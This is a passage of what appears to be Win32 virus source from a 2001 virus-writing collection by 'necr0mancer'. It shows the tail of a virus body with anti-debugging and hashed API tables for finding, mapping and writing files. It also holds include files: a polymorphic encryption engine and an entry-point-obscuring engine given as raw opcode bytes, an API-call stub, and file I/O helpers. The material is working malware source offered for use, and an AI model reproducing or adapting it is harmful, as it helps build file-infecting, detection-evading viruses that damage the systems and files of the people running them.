call PM_out
|
||
|
||
xor eax,eax
|
||
smov edx,71h
|
||
call PM_out
|
||
|
||
jmp $
|
||
|
||
;=============================================================================
|
||
PM_out proc
|
||
|
||
push eax
|
||
push edx
|
||
mov edx, esp
|
||
smov eax,0F7h ;WRITE_PORT_UCHAR
|
||
int 2Eh
|
||
add esp, 2*4
|
||
retn
|
||
PM_out endp
|
||
;=============================================================================
|
||
|
||
Debuger_fuckup endp
|
||
|
||
c_manager:
|
||
include call_mng.inc
|
||
cm_size equ $-offset c_manager
|
||
|
||
include RIPbin.inc
|
||
include ring3io.inc
|
||
include npe32bin.inc
|
||
|
||
|
||
_Table:
|
||
|
||
_CreateFileA dd 0830F55B4h
|
||
_CreateFileMapping dd 06817C213h
|
||
_MapViewOfFile dd 0CF4C00A1h
|
||
_UnmapViewOfFile dd 0C027BC23h
|
||
|
||
_CloseHandle dd 07CD0735Bh
|
||
_ReadFile dd 02804FB4Dh
|
||
_FindFirstFileA dd 0A32BE888h
|
||
_FindNextFileA dd 0233AEB5Eh
|
||
_FindClose dd 0E6CCF387h
|
||
_GlobalAlloc dd 06CCA7EE0h
|
||
_GlobalFree dd 04753EBE5h
|
||
_SetFilePointer dd 0E747C386h
|
||
_WriteFile dd 018D5ABDFh
|
||
_GetCurrentDirectoryA dd 0B089B6BEh
|
||
_IsDebuggerPresent dd 015B27F29h
|
||
_ExitThread dd 01E799321h
|
||
_CreateThread dd 072F17A7Bh
|
||
|
||
its_over dd 0FFFFFFFFh
|
||
_fbodyend:
|
||
|
||
|
||
|
||
|
||
_adr:
|
||
CreateFile dd ? ;2
|
||
|
||
CreateFileMappingA dd ?
|
||
MapViewOfFile dd ?
|
||
UnmapViewOfFile dd ?
|
||
|
||
CloseHandle dd ? ;3
|
||
ReadFile dd ? ;4
|
||
FindFirstFile dd ? ;6
|
||
FindNextFile dd ? ;7
|
||
FindClose dd ? ;8
|
||
GlobalAlloc dd ? ;9
|
||
GlobalFree dd ? ;a
|
||
SetFilePointer dd ? ;b
|
||
WriteFile dd ? ;c
|
||
GetCurrentDirectory dd ? ;d
|
||
IsDebuggerPresent dd ?
|
||
ExitThread dd ?
|
||
CreateThread dd ?
|
||
|
||
;-------------------------------------
|
||
|
||
curdir db 260 dup (?)
|
||
SearchRec f_struc<,,,,,,,>
|
||
|
||
DirNum db ?
|
||
FileNum db ?
|
||
bytesread dd ?
|
||
|
||
|
||
first_run_npe dd ?
|
||
runSeed dd ?
|
||
dirname dd ?
|
||
|
||
jmp_tmp_table:
|
||
dq 10 dup (?)
|
||
_endvbody:
|
||
end _emulation
|
||
|
||
;==============================================================================
|
||
; (C) necr0mancer 2001
|
||
; necr0mancer2001@hotmail.com
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ
|
||
MAX_GARBAGE equ 6
|
||
MAX_OPERATIONS equ 5
|
||
|
||
;cryptor size
|
||
; 100+(6*5*6*5)~1kb maximum
|
||
;
|
||
;
|
||
|
||
|
||
__eax equ 000b
|
||
__ebx equ 011b
|
||
__edx equ 010b
|
||
__ecx equ 001b
|
||
__esi equ 110b
|
||
__edi equ 111b
|
||
__ebp equ 101b
|
||
|
||
smov macro p1,p2
|
||
if p2 gt 07fh
|
||
|
||
if p2 lt 100h
|
||
|
||
if p1 eq eax
|
||
xor eax,eax
|
||
mov al,&p2&
|
||
endif
|
||
|
||
if p1 eq ebx
|
||
xor ebx,ebx
|
||
mov bl,&p2&
|
||
endif
|
||
|
||
if p1 eq ecx
|
||
xor ecx,ecx
|
||
mov cl,&p2&
|
||
endif
|
||
|
||
if p1 eq edx
|
||
xor edx,edx
|
||
mov dl,&p2&
|
||
endif
|
||
else
|
||
|
||
mov &p1&,&p2&
|
||
|
||
endif
|
||
|
||
else
|
||
push &p2&
|
||
pop &p1&
|
||
endif
|
||
|
||
endm
|
||
|
||
opcod struc
|
||
code dw 0
|
||
flags db 0
|
||
code_num db 0
|
||
opcod ends
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ
|
||
;=============================================================================
|
||
;Api_call stub (c) necr0mancer
|
||
;necr0mancer2001@hotmail.com
|
||
;=============================================================================
|
||
db 09Ch,060h,0E8h,000h,000h,000h,000h,05Dh,0CCh,025h,0FFh,000h,000h,000h,050h
|
||
db 055h,033h,0FFh,0E8h,031h,000h,000h,000h,05Dh,057h,08Dh,07Dh,00Bh,0B8h,090h
|
||
db 090h,090h,090h,0ABh,0AAh,05Fh,058h,0C1h,0E0h,003h,00Bh,0FFh,075h,007h,0BFh
|
||
db 000h,000h,000h,000h,0EBh,003h,089h,07Dh,026h,08Dh,03Ch,007h,08Bh,044h,024h
|
||
db 024h,089h,044h,024h,01Ch,089h,07Ch,024h,024h,061h,09Dh,0C3h
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ
|
||
;==============================================================================
|
||
; Necromancer's Polymorphic Engine
|
||
; v 1.0
|
||
; (c) necr0mancer december 2001
|
||
;
|
||
;
|
||
;stdcall
|
||
;int NPE_main(
|
||
; DWORD *offset data //offset to data
|
||
; DWORD *offset bufer //offset of bufer(see ramarks)
|
||
; DWORD count_bytes //size of crypting data
|
||
; DWORD seed //(see remarks)
|
||
; DWORD flags //(see remarks)
|
||
; );
|
||
;
|
||
;Output: EAX = Size of crypted data and decryptor.
|
||
; cf = 1 if error
|
||
; cf = 0 if success
|
||
;
|
||
;Remarks:
|
||
; Engine must run in r/w section.
|
||
;
|
||
; *bufer : Size of bufer must be larger of really size data beakose NPE use
|
||
; bufer for building cryptor/decryptor.
|
||
; In real size of bufer must be about 400h*3+size of data+1
|
||
; But I test it with many-memory allocate & can't said
|
||
; about working npe32 with little bufer.
|
||
;
|
||
; Flags:
|
||
;
|
||
; bits:
|
||
; ÚÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||
; ³ 0..6 ³ Using regs32 ³
|
||
; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||
; ³ 7 ³ Antidebug functions enabled ³
|
||
; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||
; ³ 8..11 ³ number of commands in using commands ³
|
||
; ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||
; ³ 11..16 ³ number of commands in using garbage ³
|
||
; ÀÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||
;
|
||
; Regs32 (bits 0..6):
|
||
; ÚÄÄÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄÂÄÄÄ¿
|
||
; ³ bit ³ 0 ³ 1 ³ 2 ³ 3 ³ 4 ³ 5 ³ 6 ³
|
||
; ÃÄÄÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄÅÄÄÄ´
|
||
; ³ reg ³EAX³EBX³EDX³ECX³ESI³EDI³EBP³
|
||
; ÀÄÄÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÁÄÄÄÙ
|
||
;
|
||
; Seed:
|
||
; if this parametr is not NULL then randseed generator of NPE32
|
||
; gets a new value for inicialize.If it is NULL NPE32 use getted
|
||
; value for any random operations.
|
||
;
|
||
;And one 'little' thing : npe32 has a bug working in multi-layer mode,
|
||
;which destroyes original data.If size of encryptors+data more than
|
||
;D00h bytes it happends.
|
||
;
|
||
;necr0mancer2001@hotmail.com
|
||
npe_main:
|
||
db 060h,0E8h,000h,000h,000h,000h,05Dh,0EBh,077h,081h,0C0h,0A1h,001h,081h,0E8h
|
||
db 0A1h,000h,081h,0F0h,0A1h,002h,0F7h,0D0h,085h,003h,0D1h,0C0h,085h,005h,0D1h
|
||
db 0C8h,085h,004h,040h,000h,045h,007h,048h,000h,045h,006h,0F7h,0D8h,085h,008h
|
||
db 087h,0C0h,082h,000h,08Bh,0C0h,082h,000h,083h,0C0h,0C9h,000h,083h,0E8h,0C9h
|
||
db 000h,090h,090h,040h,000h,0EBh,000h,080h,000h,083h,0C8h,0CDh,000h,083h,0F0h
|
||
db 0CDh,000h,00Bh,0C0h,082h,000h,023h,0C0h,082h,000h,000h,003h,002h,001h,006h
|
||
db 007h,005h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,061h,0F9h,0C3h,08Bh,04Ch,024h,030h,0E3h,006h,089h
|
||
db 08Dh,0D0h,004h,000h,000h,08Bh,054h,024h,034h,052h,083h,0E2h,07Fh,08Dh,07Dh
|
||
db 070h,08Dh,075h,04Fh,033h,0C0h,040h,06Ah,007h,059h,033h,0DBh,052h,023h,0D0h
|
||
db 074h,002h,043h,0A4h,0D1h,0E0h,05Ah,0E2h,0F4h,00Bh,0DBh,074h,0CBh,083h,0FBh
|
||
db 003h,072h,0C6h,089h,09Dh,0BBh,003h,000h,000h,058h,08Bh,0D0h,066h,081h,0E2h
|
||
db 0FFh,000h,066h,025h,000h,0FFh,0C1h,0E8h,008h,08Bh,0C8h,025h,0F0h,000h,000h
|
||
db 000h,0C1h,0E8h,004h,083h,0F8h,009h,076h,003h,06Ah,009h,058h,00Bh,0C0h,074h
|
||
db 09Bh,089h,085h,0C2h,001h,000h,000h,083h,0E1h,00Fh,083h,0F9h,00Ah,076h,003h
|
||
db 06Ah,00Ah,059h,00Bh,0C9h,074h,086h,089h,08Dh,0D1h,003h,000h,000h,08Bh,04Ch
|
||
db 024h,02Ch,089h,08Dh,0F5h,002h,000h,000h,08Bh,07Ch,024h,028h,08Bh,074h,024h
|
||
db 024h,057h,053h,051h,081h,0C7h,000h,00Ch,000h,000h,057h,0B8h,090h,000h,000h
|
||
db 000h,003h,0C8h,0F3h,0AAh,05Fh,059h,08Bh,0DFh,00Fh,0BAh,0E2h,007h,073h,017h
|
||
db 051h,056h,08Dh,0B5h,007h,005h,000h,000h,0B9h,019h,000h,000h,000h,001h,08Dh
|
||
db 0F5h,002h,000h,000h,0F3h,0A4h,05Eh,059h,0F3h,0A4h,08Dh,08Dh,0CDh,004h,000h
|
||
db 000h,058h,08Bh,0F0h,0FFh,0D1h,08Ah,054h,005h,070h,08Bh,0C6h,0FFh,0D1h,08Ah
|
||
db 074h,005h,070h,03Ah,0F2h,074h,0F4h,088h,075h,057h,056h,04Eh,04Eh,08Bh,0C6h
|
||
db 0FFh,0D1h,040h,066h,089h,085h,0FEh,002h,000h,000h,091h,058h,08Dh,075h,070h
|
||
db 08Dh,07Dh,064h,0E8h,00Eh,003h,000h,000h,05Fh,057h,033h,0C0h,0E8h,0E1h,000h
|
||
db 000h,000h,050h,0DBh,01Ch,024h,058h,06Ah,005h,058h,0E8h,03Eh,003h,000h,000h
|
||
db 040h,091h,08Bh,044h,024h,004h,005h,000h,00Ch,000h,000h,089h,045h,05Ch,051h
|
||
db 057h,00Fh,0B7h,085h,0FEh,002h,000h,000h,08Bh,0C8h,048h,08Dh,075h,064h,08Dh
|
||
db 07Eh,006h,08Bh,0DFh,0E8h,0D1h,002h,000h,000h,05Fh,087h,0F3h,0ACh,08Ah,0F0h
|
||
db 056h,033h,0C0h,0B0h,0FFh,0BBh,000h,000h,000h,000h,08Dh,075h,003h,0E8h,013h
|
||
db 002h,000h,000h,08Dh,075h,05Ch,087h,026h,08Ah,0E6h,050h,08Bh,045h,060h,050h
|
||
db 087h,026h,05Eh,0E2h,0DAh,059h,0E2h,0BBh,033h,0C0h,0E8h,047h,001h,000h,000h
|
||
db 05Eh,060h,0FFh,0D6h,061h,05Fh,057h,08Bh,0DFh,081h,0C3h,000h,00Ch,000h,000h
|
||
db 056h,053h,0B0h,001h,0E8h,062h,000h,000h,000h,0E8h,0A7h,001h,000h,000h,08Dh
|
||
db 075h,05Ch,087h,026h,058h,089h,045h,060h,058h,08Bh,0DCh,087h,026h,08Bh,00Ch
|
||
db 024h,03Bh,0D9h,077h,00Eh,08Ah,0F4h,0B4h,000h,08Dh,075h,003h,0E8h,0BAh,001h
|
||
db 000h,000h,0EBh,0D8h,0B0h,001h,0E8h,000h,001h,000h,000h,08Bh,0DFh,05Eh,00Fh
|
||
db 0B7h,085h,0FEh,002h,000h,000h,0B9h,000h,000h,000h,000h,066h,0F7h,0E1h,091h
|
||
db 0F3h,0A5h,058h,02Bh,0F8h,089h,07Ch,024h,01Ch,0BFh,000h,000h,000h,000h,08Bh
|
||
db 045h,058h,050h,0DBh,01Ch,024h,059h,02Bh,0D9h,003h,0C3h,0ABh,0F8h,061h,0C2h
|
||
db 014h,000h,08Bh,0F7h,0FEh,0C8h,075h,008h,08Dh,08Dh,0ADh,003h,000h,000h,0EBh
|
||
db 006h,08Dh,08Dh,0E0h,003h,000h,000h,033h,0C0h,048h,0E8h,04Eh,002h,000h,000h
|
||
db 089h,045h,058h,0FFh,0D1h,057h,0DBh,004h,024h,058h,0B0h,0E8h,0AAh,033h,0C0h
|
||
db 0ABh,0FFh,0D1h,052h,08Bh,085h,0BBh,003h,000h,000h,0E8h,030h,002h,000h,000h
|
||
db 08Ah,074h,005h,070h,080h,0FEh,000h,074h,0ECh,0B0h,058h,00Ah,0C6h,0AAh,0FFh
|
||
db 0D1h,066h,0B8h,081h,0E8h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,083h,0C0h,005h
|
||
db 0ABh,0FFh,0D1h,051h,066h,0B8h,08Dh,080h,00Ah,0E6h,08Ah,075h,057h,08Ah,0D6h
|
||
db 0C0h,0E6h,003h,00Ah,0E6h,066h,0ABh,08Bh,045h,058h,02Bh,0DEh,003h,0C3h,089h
|
||
db 0BDh,04Dh,002h,000h,000h,0ABh,059h,0FFh,0D1h,066h,0B8h,087h,0E0h,00Ah,0E2h
|
||
db 066h,0ABh,05Ah,0FFh,0D1h,0B0h,0B8h,00Ah,0C2h,0AAh,052h,051h,0B8h,000h,000h
|
||
db 000h,000h,099h,033h,0C9h,066h,0B9h,000h,000h,0C1h,0E1h,002h,066h,0F7h,0F1h
|
||
db 040h,089h,085h,03Bh,002h,000h,000h,0ABh,059h,0FFh,0D1h,08Bh,0C7h,040h,089h
|
||
db 085h,07Bh,003h,000h,000h,087h,0CAh,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,08Dh
|
||
db 075h,064h,0ACh,00Ch,058h,0AAh,0FFh,0D2h,0E2h,0F8h,05Ah,0C3h,053h,050h,0FEh
|
||
db 0C8h,075h,008h,08Dh,09Dh,0ADh,003h,000h,000h,0EBh,006h,08Dh,09Dh,0E0h,003h
|
||
db 000h,000h,0FFh,0D3h,00Fh,0B6h,08Dh,0FEh,002h,000h,000h,051h,08Dh,075h,064h
|
||
db 003h,0F1h,04Eh,0FDh,0ACh,0FCh,00Ch,050h,0AAh,0FFh,0D3h,0E2h,0F6h,066h,0B8h
|
||
db 081h,0C4h,066h,0ABh,058h,0C1h,0E0h,002h,0ABh,0FFh,0D3h,066h,0B8h,048h,074h
|
||
db 00Ah,0C2h,066h,0ABh,057h,0AAh,0FFh,0D3h,0B0h,0E9h,0AAh,0BEh,000h,000h,000h
|
||
db 000h,08Bh,0C7h,083h,0C0h,005h,02Bh,0C6h,0F7h,0D8h,0ABh,0FFh,0D3h,087h,0FEh
|
||
db 05Fh,08Bh,0C6h,02Bh,0C7h,048h,0AAh,087h,0FEh,0FFh,0D3h,066h,0B8h,087h,0E0h
|
||
db 00Ah,065h,057h,066h,0ABh,0FFh,0D3h,058h,0FEh,0C8h,074h,003h,0B0h,0C3h,0AAh
|
||
db 05Bh,0C3h,060h,0B8h,006h,000h,000h,000h,0E8h,015h,001h,000h,000h,040h,091h
|
||
db 0B8h,000h,000h,000h,000h,0E8h,009h,001h,000h,000h,08Ah,074h,005h,070h,0B8h
|
||
db 0FFh,000h,000h,000h,08Dh,075h,027h,0BBh,000h,000h,000h,000h,0E8h,007h,000h
|
||
db 000h,000h,0E2h,0DEh,089h,03Ch,024h,061h,0C3h,060h,03Ch,0FFh,074h,016h,0C6h
|
||
db 045h,056h,001h,08Dh,004h,086h,00Fh,0B6h,058h,003h,08Dh,004h,09Eh,08Ah,050h
|
||
db 002h,066h,08Bh,000h,0EBh,017h,0C6h,045h,056h,000h,093h,0E8h,0C7h,000h,000h
|
||
db 000h,089h,044h,024h,01Ch,08Dh,004h,086h,08Ah,050h,002h,066h,08Bh,000h,08Ah
|
||
db 0EAh,080h,0FEh,000h,075h,006h,00Fh,0BAh,0E2h,002h,073h,062h,080h,0E2h,003h
|
||
db 00Ah,0D2h,074h,013h,0FEh,0CAh,074h,007h,08Ah,0D6h,0C0h,0E2h,003h,00Ah,0E2h
|
||
db 00Ah,0E4h,075h,002h,00Ah,0C6h,00Ah,0E6h,08Ah,0D5h,080h,0E2h,0C0h,0C0h,0EAh
|
||
db 006h,0FEh,0CAh,075h,003h,0AAh,0EBh,002h,066h,0ABh,08Ah,0D5h,080h,0E2h,038h
|
||
db 0C0h,0EAh,003h,0FEh,04Dh,056h,074h,00Dh,033h,0C0h,048h,0E8h,06Dh,000h,000h
|
||
db 000h,089h,045h,060h,0EBh,003h,08Bh,045h,060h,080h,0FAh,004h,074h,00Bh,080h
|
||
db 0FAh,002h,074h,009h,0FEh,0CAh,074h,009h,0EBh,00Ah,0ABh,0EBh,007h,066h,0ABh
|
||
db 0EBh,003h,033h,0C0h,0AAh,089h,03Ch,024h,061h,0C3h,060h,049h,074h,02Bh,050h
|
||
db 058h,050h,0E8h,03Ah,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah
|
||
db 045h,057h,074h,0EDh,0AAh,086h,0E0h,05Bh,0ACh,03Ah,0C2h,074h,0FBh,03Ah,045h
|
||
db 057h,074h,0F6h,03Ah,0C4h,074h,0F2h,0AAh,0E2h,0EFh,061h,0C3h,093h,08Bh,0C3h
|
||
db 0E8h,00Fh,000h,000h,000h,08Ah,004h,006h,03Ah,0C2h,074h,0F2h,03Ah,045h,057h
|
||
db 074h,0EDh,0AAh,061h,0C3h,060h,050h,0B8h,078h,056h,034h,012h,0BFh,005h,084h
|
||
db 008h,008h,0F7h,0E7h,040h,089h,085h,0D0h,004h,000h,000h,033h,0D2h,059h,00Bh
|
||
db 0C9h,074h,006h,0F7h,0F1h,089h,054h,024h,01Ch,061h,0C3h,04Eh,050h,045h,033h
|
||
db 032h,05Bh,031h,033h,031h,038h,05Dh,06Eh,065h,063h,072h,030h,06Dh,061h,06Eh
|
||
db 063h,065h,072h,057h,00Fh,001h,04Ch,024h,0FEh,05Fh,089h,047h,008h,089h,047h
|
||
db 018h,00Fh,023h,0C0h,00Fh,023h,0C8h,00Fh,023h,0D0h,00Fh,023h,0D8h
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ
|
||
;Include file ring-3 InputOutput functions
|
||
;(c) necr0mancer
|
||
;
|
||
; necr0mancer2001@hotmail.com
|
||
|
||
;-------------------------------
|
||
;Input:edx=offset of filename
|
||
|
||
fopen proc
|
||
|
||
pushad
|
||
|
||
xor ebx,ebx
|
||
|
||
push ebx
|
||
push FILE_ATTRIBUTE_NORMAL
|
||
push OPEN_EXISTING
|
||
push ebx
|
||
push FILE_SHARE_READ + FILE_SHARE_WRITE
|
||
push GENERIC_READ + GENERIC_WRITE
|
||
push edx
|
||
call [ebp+CreateFile @ex]
|
||
|
||
inc eax ;eax=-1?
|
||
jz fopen_exit
|
||
dec eax
|
||
|
||
fopen_exit:
|
||
|
||
mov [esp._eax], eax
|
||
popad
|
||
retn
|
||
fopen endp
|
||
|
||
|
||
;-------------------------------
|
||
;Input:ebx=handle
|
||
|
||
fclose proc
|
||
|
||
pushad
|
||
|
||
push ebx
|
||
call [ebp+CloseHandle @ex]
|
||
|
||
popad
|
||
retn
|
||
fclose endp
|
||
|
||
|
||
;-------------------------------
|
||
;Input:ebx=handle file
|
||
; ecx=count of bytes to read
|
||
; edx=offset of bufer
|
||
fread proc
|
||
|
||
pushad
|
||
|
||
push 0
|
||
|
||
lea eax,[ebp+offset bytesread @ex]
|
||
push eax
|
||
|
||
push ecx
|
||
push edx
|
||
push ebx
|
||
call [ebp+ReadFile @ex]
|
||
|
||
popad
|
||
retn
|
||
fread endp
|
||
|
||
;-------------------------------
|
||
;Input:ebx=handle file
|
||
; ecx=count of bytes to move
|
||
fseek proc
|
||
|
||
pushad
|
||
|
||
push FILE_BEGIN
|
||
push 0
|
||
push ecx
|
||
push ebx
|
||
call [ebp+SetFilePointer @ex]
|
||
|
||
popad
|
||
retn
|
||
fseek endp
|
||
|
||
|
||
|
||
;-------------------------------
|
||
;Input:ebx=handle file
|
||
; ecx=count of bytes to write
|
||
; edi=offset of bufer
|
||
|
||
fwrite proc
|
||
|
||
pushad
|
||
|
||
push 0
|
||
|
||
lea eax,[ebp+offset bytesread @ex]
|
||
push eax
|
||
|
||
push ecx
|
||
push edi
|
||
|
||
push ebx
|
||
call [ebp+WriteFile @ex]
|
||
|
||
popad
|
||
retn
|
||
fwrite endp
|
||
|
||
|
||
f_createmap proc
|
||
pusha
|
||
|
||
xor eax,eax
|
||
push eax ;for mapvievoffile
|
||
|
||
push eax ;name
|
||
push eax ;lowsize
|
||
push eax ;highsize
|
||
push PAGE_READWRITE
|
||
push eax
|
||
push ebx
|
||
call [ebp+CreateFileMappingA @ex]
|
||
|
||
xchg ebx,eax
|
||
|
||
pop eax ;null
|
||
push eax ;count bytes
|
||
push eax ;lowsize
|
||
push eax ;highsize
|
||
push FILE_MAP_WRITE
|
||
push ebx
|
||
call [ebp+MapViewOfFile @ex]
|
||
|
||
mov [esp+_eax],eax
|
||
popa
|
||
retn
|
||
f_createmap endp
|
||
|
||
|
||
f_closemap proc
|
||
pusha
|
||
push ebx
|
||
call [ebp+UnmapViewOfFile @ex]
|
||
popa
|
||
retn
|
||
f_closemap endp
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RING3IO.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ
|
||
;It "engine" I have written for fun;)
|
||
;-----------------------------------------------------------------------------
|
||
;Create_UEP(
|
||
; dword VO // virtual offset
|
||
; *dword code // offset to .code section(already has read)
|
||
; *dword reloc // offset to .reloc section(already has read)
|
||
; dword num_records // count of records in table to rewrite
|
||
; *dword adr_modify // address of "replasing" proc
|
||
; *dword mask_table // pointer to a mask table
|
||
; );
|
||
;+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||
Create_UEP:
|
||
db 060h,08Bh,074h,024h,02Ch,08Bh,07Ch,024h,028h,081h,0EFh,000h,010h,000h,000h
|
||
db 003h,03Eh,08Bh,046h,004h,0BAh,008h,000h,000h,000h,052h,02Bh,0C2h,099h,0B9h
|
||
db 002h,000h,000h,000h,066h,0F7h,0F1h,05Ah,091h,00Fh,0B7h,004h,016h,066h,025h
|
||
db 0FFh,00Fh,003h,0C7h,056h,051h,093h,08Bh,074h,024h,040h,033h,0C0h,0ACh,00Fh
|
||
db 0B6h,0C8h,066h,0ADh,00Bh,0C0h,074h,012h,049h,074h,008h,066h,039h,043h,0FEh
|
||
db 074h,026h,0EBh,005h,038h,043h,0FEh,074h,01Fh,0EBh,0E4h,059h,05Eh,083h,0C2h
|
||
db 002h,0E2h,0CAh,08Bh,046h,004h,003h,0F0h,099h,033h,0D2h,0BBh,000h,010h,000h
|
||
db 000h,0F7h,0F3h,00Bh,0D2h,074h,095h,0F9h,0EBh,02Dh,093h,059h,05Eh,051h,057h
|
||
db 0F8h,08Dh,05Ch,024h,038h,0FFh,00Bh,08Bh,00Bh,0E3h,01Bh,048h,048h,08Bh,0D8h
|
||
db 02Bh,0C7h,003h,006h,087h,0DFh,093h,056h,08Bh,074h,024h,030h,08Bh,044h,024h
|
||
db 040h,0FFh,0D0h,05Eh,05Fh,059h,0EBh,0BAh,05Fh,059h,061h,0C2h,018h,000h
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[RIPBIN.INC]ÄÄÄ
|
||
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN.INC]ÄÄÄ
|
||
;Windows95/NT assembly language include file by SMT/SMF. All rights reserved.
|
||
;Modifed by Necr0mancer.No rights reserved.
|
||
|
||
NULL equ 0
|
||
TRUE equ 1
|
||
FALSE equ 0
|
||
|
||
MAX_PATH equ 260
|
||
PIPE_WAIT equ 00000000h
|
||
PIPE_NOWAIT equ 00000001h
|
||
PIPE_READMODE_BYTE equ 00000000h
|
||
PIPE_READMODE_MESSAGE equ 00000002h
|
||
PIPE_TYPE_BYTE equ 00000000h
|
||
PIPE_TYPE_MESSAGE equ 00000004h
|
||
SC_SIZE equ 0F000h
|
||
SC_MOVE equ 0F010h
|
||
SC_MINIMIZE equ 0F020h
|
||
SC_MAXIMIZE equ 0F030h
|
||
SC_NEXTWINDOW equ 0F040h
|
||
SC_PREVWINDOW equ 0F050h
|
||
SC_CLOSE equ 0F060h
|
||
SC_VSCROLL equ 0F070h
|
||
SC_HSCROLL equ 0F080h
|
||
SC_MOUSEMENU equ 0F090h
|
||
SC_KEYMENU equ 0F100h
|
||
SC_ARRANGE equ 0F110h
|
||
SC_RESTORE equ 0F120h
|
||
SC_TASKLIST equ 0F130h
|
||
SC_SCREENSAVE equ 0F140h
|
||
SC_HOTKEY equ 0F150h
|
||
SC_DEFAULT equ 0F160h
|
||
SC_MONITORPOWER equ 0F170h
|
||
SC_CONTEXTHELP equ 0F180h
|
||
SC_SEPARATOR equ 0F00Fh
|
||
|
||
WM_NULL equ 0000h
|
||
WM_CREATE equ 0001h
|
||
WM_DESTROY equ 0002h
|
||
WM_MOVE equ 0003h
|
||
WM_SIZE equ 0005h
|
||
WM_ACTIVATE equ 0006h
|
||
WA_INACTIVE equ 0
|
||
WA_ACTIVE equ 1
|
||
WA_CLICKACTIVE equ 2
|
||
WM_SETFOCUS equ 0007h
|
||
WM_KILLFOCUS equ 0008h
|
||
WM_ENABLE equ 000Ah
|
||
WM_SETREDRAW equ 000Bh
|
||
WM_SETTEXT equ 000Ch
|
||
